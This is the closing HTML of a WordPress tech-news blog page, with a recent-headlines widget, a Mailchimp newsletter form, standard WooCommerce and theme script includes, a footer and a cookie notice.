	<section id="rpwe_widget-3" class="widget rpwe_widget recent-posts-extended"><h2 class="widget-title" itemprop="name">Top news</h2><div  class="rpwe-block "><ul class="rpwe-ul"><li class="rpwe-li rpwe-clearfix"><a class="rpwe-img" href="https://jeremy-denton.com/facebook-wont-let-firefox-thwart-political-manipulation-mozilla-complains-to-eu/"  rel="bookmark"><img class="rpwe-alignleft rpwe-thumb" src="https://jeremy-denton.com/wp-content/uploads/2020/02/20170323-denelle-dixon-mozilla-coo-100x100.jpg" alt="Facebook won&#8217;t let Firefox thwart political manipulation, Mozilla complains to EU"></a><h3 class="rpwe-title"><a href="https://jeremy-denton.com/facebook-wont-let-firefox-thwart-political-manipulation-mozilla-complains-to-eu/" title="Permalink to Facebook won&#8217;t let Firefox thwart political manipulation, Mozilla complains to EU" rel="bookmark">Facebook won&#8217;t let Firefox thwart political manipulation, Mozilla complains to EU</a></h3><time class="rpwe-time published" datetime="2020-02-08T10:00:41+00:00">February 8, 2020</time></li><li class="rpwe-li rpwe-clearfix"><a class="rpwe-img" href="https://jeremy-denton.com/microsofts-edge-browser-warns-you-about-fake-news/"  rel="bookmark"><img class="rpwe-alignleft rpwe-thumb" src="https://jeremy-denton.com/wp-content/uploads/2020/02/img-4049-100x100.jpg" alt="Microsoft&#8217;s Edge browser warns you about fake news"></a><h3 class="rpwe-title"><a href="https://jeremy-denton.com/microsofts-edge-browser-warns-you-about-fake-news/" title="Permalink to Microsoft&#8217;s Edge browser warns you about fake news" rel="bookmark">Microsoft&#8217;s Edge browser warns you about fake news</a></h3><time class="rpwe-time published" datetime="2019-12-25T08:12:32+00:00">December 25, 2019</time></li><li class="rpwe-li rpwe-clearfix"><a class="rpwe-img" href="https://jeremy-denton.com/after-verizons-ho-hum-results-5g-cant-come-soon-enough/"  rel="bookmark"><img class="rpwe-alignleft rpwe-thumb" src="https://jeremy-denton.com/wp-content/uploads/2020/02/verizon-keynote-2019-14-100x100.jpg" alt="After Verizon&#8217;s ho-hum results, 5G can&#8217;t come soon enough"></a><h3 class="rpwe-title"><a href="https://jeremy-denton.com/after-verizons-ho-hum-results-5g-cant-come-soon-enough/" title="Permalink to After Verizon&#8217;s ho-hum results, 5G can&#8217;t come soon enough" rel="bookmark">After Verizon&#8217;s ho-hum results, 5G can&#8217;t come soon enough</a></h3><time class="rpwe-time published" datetime="2020-01-29T22:23:39+00:00">January 29, 2020</time></li><li class="rpwe-li rpwe-clearfix"><a class="rpwe-img" href="https://jeremy-denton.com/twitter-under-investigation-for-allegedly-refusing-to-reveal-how-it-tracks-you/"  rel="bookmark"><img class="rpwe-alignleft rpwe-thumb" src="https://jeremy-denton.com/wp-content/uploads/2020/02/gettyimages-1020305030-100x100.jpg" alt="Twitter under investigation for allegedly refusing to reveal how it tracks you"></a><h3 class="rpwe-title"><a href="https://jeremy-denton.com/twitter-under-investigation-for-allegedly-refusing-to-reveal-how-it-tracks-you/" title="Permalink to Twitter under investigation for allegedly refusing to reveal how it tracks you" rel="bookmark">Twitter under investigation for allegedly refusing to reveal how it tracks you</a></h3><time class="rpwe-time published" datetime="2020-02-14T00:34:31+00:00">February 14, 2020</time></li><li class="rpwe-li rpwe-clearfix"><a class="rpwe-img" href="https://jeremy-denton.com/google-doodle-wishes-you-a-merry-christmas/"  rel="bookmark"><img class="rpwe-alignleft rpwe-thumb" src="https://jeremy-denton.com/wp-content/uploads/2020/02/google-doodle-2-christmas-2018-100x100.png" alt="Google Doodle wishes you a Merry Christmas"></a><h3 class="rpwe-title"><a href="https://jeremy-denton.com/google-doodle-wishes-you-a-merry-christmas/" title="Permalink to Google Doodle wishes you a Merry Christmas" rel="bookmark">Google Doodle wishes you a Merry Christmas</a></h3><time class="rpwe-time published" datetime="2019-12-31T22:58:36+00:00">December 31, 2019</time></li></ul></div><!-- Generated by http://wordpress.org/plugins/recent-posts-widget-extended/ --></section><section id="mc4wp_form_widget-3" class="widget widget_mc4wp_form_widget"><h2 class="widget-title" itemprop="name">Newsletter subscription</h2><script>(function() {
	window.mc4wp = window.mc4wp || {
		listeners: [],
		forms: {
			on: function(evt, cb) {
				window.mc4wp.listeners.push(
					{
						event   : evt,
						callback: cb
					}
				);
			}
		}
	}
})();
</script><!-- Mailchimp for WordPress v4.7.5 - https://wordpress.org/plugins/mailchimp-for-wp/ --><form id="mc4wp-form-1" class="mc4wp-form mc4wp-form-245" method="post" data-id="245" data-name="" ><div class="mc4wp-form-fields"><p>
	
		<input type="email" name="EMAIL" placeholder="Your email address" required />
</label>
</p>

<p>
	<input type="submit" value="Sign up" />
</p></div><label style="display: none !important;">Leave this field empty if you're human: <input type="text" name="_mc4wp_honeypot" value="" tabindex="-1" autocomplete="off" /></label><input type="hidden" name="_mc4wp_timestamp" value="1583764147" /><input type="hidden" name="_mc4wp_form_id" value="245" /><input type="hidden" name="_mc4wp_form_element_id" value="mc4wp-form-1" /><div class="mc4wp-response"></div></form><!-- / Mailchimp for WordPress Plugin --></section></aside><!-- #secondary -->
            </div><!-- .row/not-found -->
        </div><!-- #content -->
            </div><!-- .container/.main-content -->
        <footer id="colophon" class="site-footer" itemscope itemtype="http://schema.org/WPFooter">
        <div class="site-info">
		<div class="container">
			<span class="copyright">2020 Copyright  <a href="https://jeremy-denton.com/">Jeremy Denton</a>. </span>Blossom Feminine | Developed By <a href="https://blossomthemes.com/" rel="nofollow" target="_blank">Blossom Themes</a>. Powered by <a href="https://wordpress.org/" target="_blank">WordPress</a>.                    
		</div>
	</div>
        </footer><!-- #colophon -->
        <button aria-label="go to top button" id="blossom-top">
		<span><i class="fa fa-angle-up"></i>TOP</span>
	</button>
        </div><!-- #page -->
    <script>(function() {function maybePrefixUrlField() {
	if (this.value.trim() !== '' && this.value.indexOf('http') !== 0) {
		this.value = "http://" + this.value;
	}
}

var urlFields = document.querySelectorAll('.mc4wp-form input[type="url"]');
if (urlFields) {
	for (var j=0; j < urlFields.length; j++) {
		urlFields[j].addEventListener('blur', maybePrefixUrlField);
	}
}
})();</script>	<script type="text/javascript">
		var c = document.body.className;
		c = c.replace(/woocommerce-no-js/, 'woocommerce-js');
		document.body.className = c;
	</script>
	<script type='text/javascript' src='https://jeremy-denton.com/wp-content/plugins/woocommerce/assets/js/jquery-blockui/jquery.blockUI.min.js?ver=2.70'></script>
<script type='text/javascript'>
/* <![CDATA[ */
var wc_add_to_cart_params = {"ajax_url":"\/wp-admin\/admin-ajax.php","wc_ajax_url":"\/?wc-ajax=%%endpoint%%","i18n_view_cart":"View cart","cart_url":"https:\/\/jeremy-denton.com\/cart\/","is_cart":"","cart_redirect_after_add":"no"};
/* ]]> */
</script>
<script type='text/javascript' src='https://jeremy-denton.com/wp-content/plugins/woocommerce/assets/js/frontend/add-to-cart.min.js?ver=3.9.3'></script>
<script type='text/javascript' src='https://jeremy-denton.com/wp-content/plugins/woocommerce/assets/js/js-cookie/js.cookie.min.js?ver=2.1.4'></script>
<script type='text/javascript'>
/* <![CDATA[ */
var woocommerce_params = {"ajax_url":"\/wp-admin\/admin-ajax.php","wc_ajax_url":"\/?wc-ajax=%%endpoint%%"};
/* ]]> */
</script>
<script type='text/javascript' src='https://jeremy-denton.com/wp-content/plugins/woocommerce/assets/js/frontend/woocommerce.min.js?ver=3.9.3'></script>
<script type='text/javascript'>
/* <![CDATA[ */
var wc_cart_fragments_params = {"ajax_url":"\/wp-admin\/admin-ajax.php","wc_ajax_url":"\/?wc-ajax=%%endpoint%%","cart_hash_key":"wc_cart_hash_e7bbd0627ba2f5b9749f7b81e4154571","fragment_name":"wc_fragments_e7bbd0627ba2f5b9749f7b81e4154571","request_timeout":"5000"};
/* ]]> */
</script>
<script type='text/javascript' src='https://jeremy-denton.com/wp-content/plugins/woocommerce/assets/js/frontend/cart-fragments.min.js?ver=3.9.3'></script>
<script type='text/javascript' src='https://jeremy-denton.com/wp-content/themes/blossom-feminine/js/all.min.js?ver=5.6.3'></script>
<script type='text/javascript' src='https://jeremy-denton.com/wp-content/themes/blossom-feminine/js/v4-shims.min.js?ver=5.6.3'></script>
<script type='text/javascript' src='https://jeremy-denton.com/wp-content/themes/blossom-feminine/js/sticky-kit.min.js?ver=1.1.3'></script>
<script type='text/javascript' src='https://jeremy-denton.com/wp-content/themes/blossom-feminine/js/owl.carousel.min.js?ver=2.2.1'></script>
<script type='text/javascript' src='https://jeremy-denton.com/wp-content/themes/blossom-feminine/js/owl.carousel.aria.min.js?ver=2.0.0'></script>
<script type='text/javascript' src='https://jeremy-denton.com/wp-content/themes/blossom-feminine/js/jquery.matchHeight.min.js?ver=0.7.2'></script>
<script type='text/javascript' src='https://jeremy-denton.com/wp-content/themes/blossom-feminine/js/wow.min.js?ver=1.1.3'></script>
<script type='text/javascript'>
/* <![CDATA[ */
var blossom_feminine_data = {"rtl":"","animation":"","auto":"1"};
/* ]]> */
</script>
<script type='text/javascript' src='https://jeremy-denton.com/wp-content/themes/blossom-feminine/js/custom.min.js?ver=1.3.3'></script>
<script type='text/javascript' src='https://jeremy-denton.com/wp-includes/js/comment-reply.min.js?ver=5.3.2'></script>
<script type='text/javascript' src='https://jeremy-denton.com/wp-includes/js/wp-embed.min.js?ver=5.3.2'></script>
<script type='text/javascript' src='https://jeremy-denton.com/wp-content/plugins/mailchimp-for-wp/assets/js/forms.min.js?ver=4.7.5'></script>

		<!-- Cookie Notice plugin v1.2.50 by Digital Factory https://dfactory.eu/ -->
		<div id="cookie-notice" role="banner" class="cookie-notice-hidden cookie-revoke-hidden cn-position-bottom" aria-label="Cookie Notice" style="background-color: #000;"><div class="cookie-notice-container" style="color: #fff;"><span id="cn-notice-text" class="cn-text-container">We use cookies to ensure that we give you the best experience on our website. If you continue to use this site we will assume that you are happy with it.</span><span id="cn-notice-buttons" class="cn-buttons-container"><a href="#" id="cn-accept-cookie" data-cookie-set="accept" class="cn-set-cookie cn-button bootstrap button">Accept</a><a href="#" id="cn-refuse-cookie" data-cookie-set="refuse" class="cn-set-cookie cn-button bootstrap button">Refuse</a><a href="https://jeremy-denton.com/cookie-privacy-policy/" target="_blank" id="cn-more-info" class="cn-more-info cn-button bootstrap button">Cookie Privacy policy</a></span></div>
			<div class="cookie-revoke-container" style="color: #fff;"><span id="cn-revoke-text" class="cn-text-container">You can revoke your consent any time using the Revoke consent button.</span><span id="cn-revoke-buttons" class="cn-buttons-container"><a href="#" class="cn-revoke-cookie cn-button bootstrap button">Revoke consent</a></span>
			</div>
		</div>
		<!-- / Cookie Notice plugin -->
</body>
</html>

